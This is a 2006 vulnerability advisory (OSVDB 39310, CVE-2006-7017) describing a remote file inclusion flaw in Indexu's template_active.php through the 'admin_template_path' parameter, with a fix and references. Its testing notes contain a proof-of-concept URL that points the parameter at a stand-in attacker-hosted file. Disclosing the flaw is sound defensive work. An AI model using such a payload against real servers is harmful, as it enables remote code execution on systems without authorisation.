Indexu admin/template_active.php admin_template_path Variable Remote File Inclusion

2006-06-16T00:00:00
ID OSVDB:39310
Type osvdb
Reporter OSVDB
Modified 2006-06-16T00:00:00

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to <SCRIPT> not properly sanitizing user input supplied to the 'admin_template_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/indexu/admin/template_active.php?admin_template_path=http://evilcode.txt?

References:

Vendor URL: http://www.nicecoder.com/ Security Tracker: 1016330 Secunia Advisory ID:18752 Related OSVDB ID: 39355 Related OSVDB ID: 39351 Related OSVDB ID: 39353 Related OSVDB ID: 39346 Related OSVDB ID: 39347 Related OSVDB ID: 39350 Related OSVDB ID: 39345 Related OSVDB ID: 39344 Related OSVDB ID: 39341 Related OSVDB ID: 39336 Related OSVDB ID: 39332 Related OSVDB ID: 39323 Related OSVDB ID: 39315 Related OSVDB ID: 39311 Related OSVDB ID: 1018076 Related OSVDB ID: 1018077 Related OSVDB ID: 1018082 Related OSVDB ID: 1018084 Related OSVDB ID: 1018089 Related OSVDB ID: 1018090 Related OSVDB ID: 39342 Related OSVDB ID: 39339 Related OSVDB ID: 39338 Related OSVDB ID: 39337 Related OSVDB ID: 39331 Related OSVDB ID: 39330 Related OSVDB ID: 39324 Related OSVDB ID: 39326 Related OSVDB ID: 39313 Related OSVDB ID: 39314 Related OSVDB ID: 39317 Related OSVDB ID: 1018078 Related OSVDB ID: 39310 Related OSVDB ID: 1018086 Related OSVDB ID: 39352 Related OSVDB ID: 39354 Related OSVDB ID: 39349 Related OSVDB ID: 39340 Related OSVDB ID: 39334 Related OSVDB ID: 39333 Related OSVDB ID: 39327 Related OSVDB ID: 39328 Related OSVDB ID: 39318 Related OSVDB ID: 39319 Related OSVDB ID: 39316 Related OSVDB ID: 39312 Related OSVDB ID: 1018085 Related OSVDB ID: 1018087 Related OSVDB ID: 39348 Related OSVDB ID: 39343 Related OSVDB ID: 39335 Related OSVDB ID: 39329 Related OSVDB ID: 39325 Related OSVDB ID: 39320 Related OSVDB ID: 39321 Related OSVDB ID: 39322 Related OSVDB ID: 1018079 Related OSVDB ID: 1018083 Related OSVDB ID: 1018088 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html ISS X-Force ID: 27262 CVE-2006-7017